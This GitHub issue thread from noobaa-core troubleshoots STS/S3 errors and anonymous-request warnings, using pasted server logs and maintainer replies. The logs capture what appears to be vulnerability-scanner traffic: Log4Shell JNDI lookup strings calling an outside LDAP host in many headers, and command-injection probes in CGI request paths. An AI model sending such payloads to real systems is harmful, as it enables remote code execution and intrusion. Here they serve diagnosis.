### ISSUE TITLE
core.endpoint.sts.sts_rest:: STS ERROR , anonymous account and log4j error messages in s3_rest.js 

### ISSUE THREAD

**Issue by rkomandu** [noobaa/noobaa-core#8509] opened 2024-11-06 05:48 UTC
### Environment info
- NooBaa Version: **VERSION**
- Platform: **Kubernetes 1.14.1 | minikube 1.1.1 | OpenShift 4.1 | other: specify**

noobaa d/s 5.17.0-20241023 build (it is in all the builds of the 5.17.0-202410XX onwards looks like 

Observed the errors and log4j related when the S3 service is stopped, hence opening this defect.. 

Just checking backward now the first occurrence in the noobaa.log is as shown below 

```
Oct  9 00:40:46 node-gui1 node[3003970]: [/3003970] ESC[36m  [LOG]ESC[39m CONSOLE:: init_rand_seed: seeding with 32 bytes
Oct  9 00:40:58 node-gui1 [2820562]: [nsfs/2820562] ESC[33m [WARN]ESC[39m core.util.signature_utils:: Anonymous request: GET / {}
Oct  9 00:40:58 node-gui1 [2820562]: [nsfs/2820562] ESC[31m[ERROR]ESC[39m core.endpoint.sts.sts_rest:: STS ERROR <?xml version="1.0" encoding="UTF-8"?><Error><Code>InternalFailure</Code><Message>The request processing has failed because of an unknown error, exception or failure.</Message><Resource>/</Resource><RequestId>m21dtme3-9q546j-fbw</RequestId></Error> GET / {} Error: The request processing has failed because of an unknown error, exception or failure.    at parse_request_body (/usr/local/noobaa-core/src/util/http_utils.js:283:15)    at Object.read_and_parse_body (/usr/local/noobaa-core/src/util/http_utils.js:247:11)    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)    at async handle_request (/usr/local/noobaa-core/src/endpoint/sts/sts_rest.js:83:5)    at async sts_rest (/usr/local/noobaa-core/src/endpoint/sts/sts_rest.js:41:9)
Oct  9 00:40:58 node-gui1 [2820562]: [nsfs/2820562] ESC[33m [WARN]ESC[39m core.util.signature_utils:: Anonymous request: GET / {}
Oct  9 00:40:58 node-gui1 [2820562]: [nsfs/2820562] ESC[31m[ERROR]ESC[39m core.endpoint.s3.s3_rest:: S3 ERROR <?xml version="1.0" encoding="UTF-8"?><Error><Code>InternalError</Code><Message>We encountered an internal error. Please try again.</Message><Resource>/</Resource><RequestId>m21dtme5-9rdlag-zam</RequestId></Error> GET / {} TypeError: Cannot read properties of undefined (reading 'split')    at parse_bucket_and_key (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:305:31)    at populate_request_additional_info_or_redirect (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:174:28)    at handle_request (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:108:28)    at Object.s3_rest [as handler] (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:66:15)    at Server.endpoint_request_handler (/usr/local/noobaa-core/src/endpoint/endpoint.js:286:28)    at Server.emit (node:events:518:28)    at Server.emit (node:domain:488:12)    at parserOnIncoming (node:_http_server:1143:12)    at HTTPParser.parserOnHeadersComplete (node:_http_common:119:17)

```
### Actual behavior
1. Following messages are observed in the noobaa.log and the gpfs.log as shown below 

noobaa.log on the node 

```
Nov  5 00:21:19 node-gui1 [1331512]: [nsfs/1331512] ESC[33m [WARN]ESC[39m core.util.signature_utils:: Anonymous request: GET / {}
Nov  5 00:21:19 node-gui1 [1331512]: [nsfs/1331512] ESC[31m[ERROR]ESC[39m core.endpoint.sts.sts_rest:: STS ERROR <?xml version="1.0" encoding="UTF-8"?><Error><Code>InternalFailure</Code><Message>The request processing has failed because of an unknown error, exception or failure.</Message><Resource>/</Resource><RequestId>m3405ihm-aj194m-680</RequestId></Error> GET / {} Error: The request processing has failed because of an unknown error, exception or failure.    at parse_request_body (/usr/local/noobaa-core/src/util/http_utils.js:283:15)    at Object.read_and_parse_body (/usr/local/noobaa-core/src/util/http_utils.js:247:11)    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)    at async handle_request (/usr/local/noobaa-core/src/endpoint/sts/sts_rest.js:83:5)    at async sts_rest (/usr/local/noobaa-core/src/endpoint/sts/sts_rest.js:41:9)
Nov  5 00:21:19 node-gui1 [1331512]: [nsfs/1331512] ESC[33m [WARN]ESC[39m core.util.signature_utils:: Anonymous request: GET / {}
Nov  5 00:21:19 node-gui1 [1331512]: [nsfs/1331512] ESC[31m[ERROR]ESC[39m core.endpoint.s3.s3_rest:: S3 ERROR <?xml version="1.0" encoding="UTF-8"?><Error><Code>InternalError</Code><Message>We encountered an internal error. Please try again.</Message><Resource>/</Resource><RequestId>m3405iic-ayluiw-1aru</RequestId></Error> GET / {} TypeError: Cannot read properties of undefined (reading 'split')    at parse_bucket_and_key (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:305:31)    at populate_request_additional_info_or_redirect (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:174:28)    at handle_request (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:108:28)    at Object.s3_rest [as handler] (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:66:15)    at Server.endpoint_request_handler (/usr/local/noobaa-core/src/endpoint/endpoint.js:286:28)    at Server.emit (node:events:518:28)    at Server.emit (node:domain:488:12)    at parserOnIncoming (node:_http_server:1143:12)    at HTTPParser.parserOnHeadersComplete (node:_http_common:119:17)

Nov  5 00:32:20 node-gui1 [1331512]: [nsfs/1331512] [ERROR] core.endpoint.s3.s3_rest:: S3 ERROR <?xml version="1.0" encoding="UTF-8"?><Error><Code>Invalid
AccessKeyId</Code><Message>The AWS access key Id you provided does not exist in our records.</Message><Resource>/</Resource><RequestId>m340joi5-a7121q-ruy</Re
questId></Error> GET / {"host":"gpfs-p10-gui1.rtp.raleigh.ibm.com:6443","accept-charset":"iso-8859-1,utf-8;q=0.9,*;q=0.1","accept-language":"en","connection":
"Keep-Alive","user-agent":"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)","pragma":"no-cache","accept":"image/gif, image/x-xbitmap, image/jp
eg, image/pjpeg, image/png, */*"} Error: Account with access_key not found    at NsfsObjectSDK.load_requesting_account (/usr/local/noobaa-core/src/sdk/object_
sdk.js:232:61)    at async authorize_request (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:205:5)    at async handle_request (/usr/local/noobaa-core/src/
endpoint/s3/s3_rest.js:126:5)    at async Object.s3_rest [as handler] (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:66:9)
Nov  5 00:32:20 gpfs-p10-gui1 [1331513]: [nsfs/1331513]  [WARN] core.util.signature_utils:: Anonymous request: GET /cgi-bin/hw3.php?daysonly=0).system(id).( {
 host: 'node-gui1.rtp.raleigh.ibm.com:6443', 'accept-charset': 'iso-8859-1,utf-8;q=0.9,*;q=0.1', 'accept-language': 'en', connection: 'Keep-Alive', 'user-
agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)', pragma: 'no-cache', accept: 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, i
mage/png, */*' }
Nov  5 00:32:20 node-gui1 [1331513]: [nsfs/1331513]  [WARN] core.util.signature_utils:: Anonymous request: GET /cgi-bin/hw3.php?daysonly=0).system(id).( {
 host: 'node-gui1.rtp.raleigh.ibm.com:6443', 'accept-charset': 'iso-8859-1,utf-8;q=0.9,*;q=0.1', 'accept-language': 'en', connection: 'Keep-Alive', 'user-
agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)', pragma: 'no-cache', accept: 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, i
mage/png, */*' }
Nov  5 00:32:20 node-gui1 [1331513]: [nsfs/1331513]  [WARN] core.sdk.config_fs:: get_config_data: with config_file_path /ibm/fvt_ces_root/ces/s3-config/ac
counts/anonymous.json got an error [Error: No such file or directory] { code: 'ENOENT', context: 'Readfile _path=/ibm/fvt_ces_root/ces/s3-config/accounts/anon
ymous.json ' }
Nov  5 00:32:20 node-gui1 [1331513]: [nsfs/1331513] [ERROR] core.sdk.bucketspace_fs:: BucketSpaceFS.read_account_by_access_key: failed with error [Error:
No such file or directory] { code: 'ENOENT', context: 'Readfile _path=/ibm/fvt_ces_root/ces/s3-config/accounts/anonymous.json ' }
Nov  5 00:32:20 node-gui1 [1331513]: [nsfs/1331513] [ERROR] core.sdk.object_sdk:: load_requesting_account error: RpcError: Account with access_key not fou
nd.    at BucketSpaceFS.read_account_by_access_key (/usr/local/noobaa-core/src/sdk/bucketspace_fs.js:93:23)    at async LRUCache._load_item (/usr/local/noobaa
-core/src/util/lru_cache.js:83:22)    at async LRUCache.get_with_cache (/usr/local/noobaa-core/src/util/lru_cache.js:72:13)    at async NsfsObjectSDK.load_req
uesting_account (/usr/local/noobaa-core/src/sdk/object_sdk.js:217:39)    at async authorize_request (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:205:5)
   at async handle_request (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:126:5)    at async Object.s3_rest [as handler] (/usr/local/noobaa-core/src/endpo
int/s3/s3_rest.js:66:9) {  rpc_code: 'NO_SUCH_ACCOUNT',  rpc_data: [Error: No such file or directory] { code: 'ENOENT', context: 'Readfile _path=/ibm/fvt_ces_
root/ces/s3-config/accounts/anonymous.json ' }}
Nov  5 00:32:20 node-gui1 [1331513]: [nsfs/1331513] [ERROR] core.endpoint.s3.s3_rest:: S3 ERROR <?xml version="1.0" encoding="UTF-8"?><Error><Code>Invalid
AccessKeyId</Code><Message>The AWS access key Id you provided does not exist in our records.</Message><Resource>/cgi-bin/hw3.php?daysonly=0).system(id).(</Res
ource><RequestId>m340joiv-am64db-5w7</RequestId></Error> GET /cgi-bin/hw3.php?daysonly=0).system(id).( {"host":"node-gui1.com:6443","accep
t-charset":"iso-8859-1,utf-8;q=0.9,*;q=0.1","accept-language":"en","connection":"Keep-Alive","user-agent":"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1;
Trident/4.0)","pragma":"no-cache","accept":"image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*"} Error: Account with access_key not found
at NsfsObjectSDK.load_requesting_account (/usr/local/noobaa-core/src/sdk/object_sdk.js:232:61)    at async authorize_request (/usr/local/noobaa-core/src/endpo
int/s3/s3_rest.js:205:5)    at async handle_request (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:126:5)    at async Object.s3_rest [as handler] (/usr/lo
cal/noobaa-core/src/endpoint/s3/s3_rest.js:66:9)
```
gpfs.log when  the S3 service is shutdown 
```

Nov 05 00:38:07 node-gui1 [1331512]: [nsfs/1331512]  [WARN] core.util.signature_utils:: Anonymous request: GET /cgi-bin/administrator.cgi { host: 'node-gui1.com:7443', 'accept-charset': 'iso-8859-1,utf-8;q=0.9,*;q=0.1', 'accept-language': '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4
${lower:ten}.w.nessus.org/nessus}', connection: 'Keep-Alive', referer: '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}'
, 'x-api-version': '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}', cookie: '${jndi:ldap://log4shell-generic-BSwhhXUF6
D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};JSESSIONID=${jndi:ldap://lo
g4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};SESSIONID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};PHPSESSID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};token=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};session=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}', 'user-agent': '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}', pragma: 'no-cache', 'if-modified-since': '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}', accept: '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}' }
Nov 05 00:38:07 node-gui1 [1331512]: [nsfs/1331512] [ERROR] core.endpoint.sts.sts_rest:: STS ERROR <?xml version="1.0" encoding="UTF-8"?><Error><Code>InternalFailure</Code><Message>The request processing has failed because of an unknown error, exception or failure.</Message><Resource>/cgi-bin/administrator.cgi</Resource><RequestId>m340r4t3-5kzozq-17c3</RequestId></Error> GET /cgi-bin/administrator.cgi {"host":"node-gui1.com:7443","accept-charset":"iso-8859-1,utf-8;q=0.9,*;q=0.1","accept-language":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","connection":"Keep-Alive","referer":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","x-api-version":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","cookie":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};JSESSIONID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};SESSIONID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};PHPSESSID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};token=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};session=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","user-agent":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","pragma":"no-cache","if-modified-since":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","accept":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}"} Error: The request processing has failed because of an unknown error, exception or failure.    at parse_request_body (/usr/local/noobaa-core/src/util/http_utils.js:283:15)    at Object.read_and_parse_body (/usr/local/noobaa-core/src/util/http_utils.js:247:11)    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)    at async handle_request (/usr/local/noobaa-core/src/endpoint/sts/sts_rest.js:83:5)    at async sts_rest (/usr/local/noobaa-core/src/endpoint/sts/sts_rest.js:41:9)
Nov 05 00:38:12 node-gui1 [1331513]: [nsfs/1331513]  [WARN] core.util.signature_utils:: Anonymous request: GET /cgi-bin/agorn.cgi { host: 'node-gui1.com:7443', 'accept-charset': 'iso-8859-1,utf-8;q=0.9,*;q=0.1', 'accept-language': '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:
ten}.w.nessus.org/nessus}', connection: 'Keep-Alive', referer: '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}', 'x-api
-version': '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}', cookie: '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALn
Pc4${lower:ten}.w.nessus.org/nessus}=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};JSESSIONID=${jndi:ldap://log4shell-
generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};SESSIONID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};
PHPSESSID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};token=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lo
wer:ten}.w.nessus.org/nessus};session=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}', 'user-agent': '${jndi:ldap://log
4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}', pragma: 'no-cache', 'if-modified-since': '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UB
LALnPc4${lower:ten}.w.nessus.org/nessus}', accept: '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}' }
Nov 05 00:38:12 node-gui1 [1331513]: [nsfs/1331513] [ERROR] core.endpoint.sts.sts_rest:: STS ERROR <?xml version="1.0" encoding="UTF-8"?><Error><Code>Inte
rnalFailure</Code><Message>The request processing has failed because of an unknown error, exception or failure.</Message><Resource>/cgi-bin/agorn.cgi</Resourc
e><RequestId>m340r8pb-6ds42k-trb</RequestId></Error> GET /cgi-bin/agorn.cgi {"host":"gpfs-p10-gui1.rtp.raleigh.ibm.com:7443","accept-charset":"iso-8859-1,utf-8;q=0.9,*;q=0.1","accept-language":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","connection":"Keep-Alive","referer":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","x-api-version":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","cookie":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};JSESSIONID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};SESSIONID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};PHPSESSID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};token=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};session=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","user-agent":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","pragma":"no-cache","if-modified-since":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","accept":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}"} Error: The request processing has failed because of an unknown error, exception or failure.    at parse_request_body (/usr/local/noobaa-core/src/util/http_utils.js:283:15)    at Object.read_and_parse_body (/usr/local/noobaa-core/src/util/http_utils.js:247:11)    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)    at async handle_request (/usr/local/noobaa-core/src/endpoint/sts/sts_rest.js:83:5)    at async sts_rest (/usr/local/noobaa-core/src/endpoint/sts/sts_rest.js:41:9)
Nov 05 00:38:16 node-gui1 systemd[1]: Stopping The NooBaa service....
Nov 05 00:38:16 node-gui1 systemd[1]: noobaa.service: Killing process 1331522 (node) with signal SIGKILL
....


## Expected behavior
1.

The error messages when stopping the S3 service and then continuous logs in the noobaa file should be investigated as we havent created any anonymous S3 user in the environment 

### Steps to reproduce
1.

Didn't do anything specific to the operation, it shows anonymous.json as account which is not created at all in the system 

### More information - Screenshots / Logs / Other output
Will upload the noobaa.log and the gpfs.log into the box folder https://ibm.ent.box.com/folder/292595927684

**Comment by romayalon** [comment] 2024-11-19 17:37
@rkomandu Our STS port is enabled by default to be 7443, although we are not supporting STS on NC, we can disable it for now.
notice that this client is doing a GET /cgi-bin/administrator.cgi using anonymous request, you probably want to check why it's running.
regarding the STS error message when sending anonymous request I think it's a general STS issue, @Neon-White are you familiar with this? I can open a bug if this is unknown

**Comment by romayalon** [comment] 2024-11-20 14:37
@rkomandu Do you have ENDPOINT_SSL_STS_PORT in the config file? I checked in our code and by default we set it to -1 so we don't listen to STS requests unless this port is bigger than 0.

**Comment by rkomandu** [comment] 2024-11-21 03:52
@romayalon , this is our noobaa-5.17.0/1, it doesn't have the port , currently have the following in the environment 

 ENABLEMD5 : true
 ENDPOINT_FORKS : 2
 ENDPOINT_PORT : 6001
 ENDPOINT_SSL_PORT : 6443

**Comment by rkomandu** [comment] 2024-11-21 04:00
As mentioned it is in the 5.17.0 onwards

**Comment by romayalon** [comment] 2024-11-21 09:44
@rkomandu at the beginning of the logs do you see a message that says that we started the STS server and we listen to port (7443)  ?

**Comment by rkomandu** [comment] 2024-11-21 10:47
@romayalon 

when zgrep is performed 

`noobaa.log-20241026.gz:Oct 25 06:01:50 node-gui1 [1331512]: [nsfs/1331512]  [WARN] CONSOLE:: nsfs: config.json= { CONFIG_ROOT: '', ENDPOINT_FORKS: 2, NSFS_BUF_POOL_MEM_LIMIT: 0, NSFS_BUF_SIZE: 0, ENDPOINT_PORT: 6001, ENDPOINT_SSL_PORT: 6443, **ENDPOINT_SSL_STS_PORT: 0**, EP_METRICS_SERVER_PORT: 0, ALLOW_HTTP: false, NSFS_CALCULATE_MD5: true, UV_THREADPOOL_SIZE: 16, GPFS_DL_PATH: '/usr/lpp/mmfs/lib/libgpfs.so', NSFS_OPEN_READ_MODE: '', NSFS_CHECK_BUCKET_BOUNDARIES: false, NSFS_TRIGGER_FSYNC: false, NSFS_WHITELIST: [], TIME_TO_SYNC_BUCKET: 0, TIME_TO_SYNC_ACCOUNT: 0, BACKUP_PATH: '', RESTORE_PATH: '', NOOBAA_LOG_LEVEL: 'default', NSFS_NC_STORAGE_BACKEND: 'GPFS', NSFS_NC_CONFIG_DIR_BACKEND: 'GPFS', NSFS_DIR_CACHE_MAX_DIR_SIZE: 536870912, NSFS_DIR_CACHE_MAX_TOTAL_SIZE: 1073741824, NSFS_GLACIER_ENABLED: false, NSFS_GLACIER_LOGS_ENABLED: false, NC_MASTER_KEYS_GET_EXECUTABLE: '/usr/lpp/mmfs/bin/cess3_key_get', NC_MASTER_KEYS_PUT_EXECUTABLE: '/usr/lpp/mmfs/bin/cess3_key_put', NC_MASTER_KEYS_STORE_TYPE: 'executable', LOG_TO_SYSLOG_ENABLED: true, LOG_TO_STDERR_ENABLED: false, NC_DISABLE_ACCESS_CHECK: false, NSFS_RENAME_RETRIES: 1000 }

`

**Comment by rkomandu** [comment] 2024-11-21 11:04
yes @romayalon 
```

noobaa.log-20241026.gz:Oct 25 05:46:40 node-gui1 [1312177]: [nsfs/1312177]  [WARN] core.util.ssl_utils:: Generating self-signed SSL certificate for STS
noobaa.log-20241026.gz:Oct 25 05:46:40 node-gui1 [1312177]: [nsfs/1312177]    [L0] core.endpoint.endpoint:: Starting STS HTTPS 7443
noobaa.log-20241026.gz:Oct 25 05:46:40 node-gui1 [1312177]: [nsfs/1312177]    [L0] core.endpoint.endpoint:: Started STS HTTPS successfully
noobaa.log-20241026.gz:Oct 25 05:46:40 node-gui1 [1312178]: [nsfs/1312178]    [L0] core.endpoint.endpoint:: Starting STS HTTPS 7443
noobaa.log-20241026.gz:Oct 25 05:46:40 node-gui1 [1312178]: [nsfs/1312178]    [L0] core.endpoint.endpoint:: Started STS HTTPS successfully
noobaa.log-20241026.gz:Oct 25 05:57:55 node-gui1 [1311763]: [nsfs/1311763]  [WARN] CONSOLE:: nsfs: config.json= { CONFIG_ROOT: '', ENDPOINT_FORKS: 2, NSFS_BUF_POOL_MEM_LIMIT: 0, NSFS_BUF_SIZE: 0, ENDPOINT_PORT: 6001, ENDPOINT_SSL_PORT: 6443, ENDPOINT_SSL_STS_PORT: 0, EP_METRICS_SERVER_PORT: 0, ALLOW_HTTP: false, NSFS_CALCULATE_MD5: true, UV_THREADPOOL_SIZE: 16, GPFS_DL_PATH: '/usr/lpp/mmfs/lib/libgpfs.so', NSFS_OPEN_READ_MODE: '', NSFS_CHECK_BUCKET_BOUNDARIES: false, NSFS_TRIGGER_FSYNC: false, NSFS_WHITELIST: [], TIME_TO_SYNC_BUCKET: 0, TIME_TO_SYNC_ACCOUNT: 0, BACKUP_PATH: '', RESTORE_PATH: '', NOOBAA_LOG_LEVEL: 'default', NSFS_NC_STORAGE_BACKEND: 'GPFS', NSFS_NC_CONFIG_DIR_BACKEND: 'GPFS', NSFS_DIR_CACHE_MAX_DIR_SIZE: 536870912, NSFS_DIR_CACHE_MAX_TOTAL_SIZE: 1073741824, NSFS_GLACIER_ENABLED: false, NSFS_GLACIER_LOGS_ENABLED: false, NC_MASTER_KEYS_GET_EXECUTABLE: '/usr/lpp/mmfs/bin/cess3_key_get', NC_MASTER_KEYS_PUT_EXECUTABLE: '/usr/lpp/mmfs/bin/cess3_key_put', NC_MASTER_KEYS_STORE_TYPE: 'executable', LOG_TO_SYSLOG_ENABLED: true, LOG_TO_STDERR_ENABLED: false, NC_DISABLE_ACCESS_CHECK: false, NSFS_RENAME_RETRIES: 1000 }


```

**Comment by romayalon** [comment] 2024-11-27 11:10
@rkomandu per this comment, this print shows what you have in your config.json and that it included this port - "ENDPOINT_SSL_STS_PORT: 0", please remove it and try again
@Neon-White thanks, we need to handle it, [opened a bug.](https://github.com/noobaa/noobaa-core/issues/8558)

**Comment by rkomandu** [comment] 2024-11-27 14:43
@romayalon , it doesn't have 

 ENABLEMD5 : true
 ENDPOINT_FORKS : 2
 ENDPOINT_PORT : 6001
 ENDPOINT_SSL_PORT : 6443

**Comment by romayalon** [comment] 2024-12-01 16:50
@rkomandu can you show me the full config.json or reproduce on your machine ?

**Comment by rkomandu** [comment] 2024-12-02 04:12
yes @romayalon , it is as follows 

```
cat <ces-shared-root>/ces/s3-config/config.json
{"ENDPOINT_FORKS":2, "ENDPOINT_PORT":6001, "ENDPOINT_SSL_PORT":6443, "LOG_TO_SYSLOG_ENABLED":true, "ALLOW_HTTP":false, "NSFS_CALCULATE_MD5":true, "UV_THREADPOOL_SIZE":16, "GPFS_DL_PATH":"/usr/lpp/mmfs/lib/libgpfs.so", "LOG_TO_STDERR_ENABLED":false, "NC_DISABLE_ACCESS_CHECK":false, "NOOBAA_LOG_LEVEL":"all", "NSFS_NC_STORAGE_BACKEND":"GPFS", "NSFS_NC_CONFIG_DIR_BACKEND":"GPFS", "NSFS_DIR_CACHE_MAX_DIR_SIZE":536870912, "NSFS_DIR_CACHE_MAX_TOTAL_SIZE":1073741824, "NSFS_GLACIER_ENABLED":false, "NSFS_GLACIER_LOGS_ENABLED":false, "NC_MASTER_KEYS_GET_EXECUTABLE":"/usr/lpp/mmfs/bin/cess3_key_get", "NC_MASTER_KEYS_PUT_EXECUTABLE":"/usr/lpp/mmfs/bin/cess3_key_put", "NC_MASTER_KEYS_STORE_TYPE":"executable"}


```

please ping me we can look at the system, as posted this has been observed from Oct 1st week timeframe.

**Comment by naveenpaul1** [comment] 2024-12-05 05:14
@rkomandu S3 request was sent without any header information and that is why s3_rest is throwing an error. 
Noobaa doesn't have any log4j error, you are seeing log4j in logs only because some client/agent with the name `log4shell-generic` is sending an empty header s3 request to Noobaa.

**Closed** 2024-12-20 12:12 UTC
Labels: NS-FS

**Comment by romayalon** [comment] 2024-12-23 07:15
@rkomandu @naveenpaul1 Naveen fixed this issue, can you please validate?
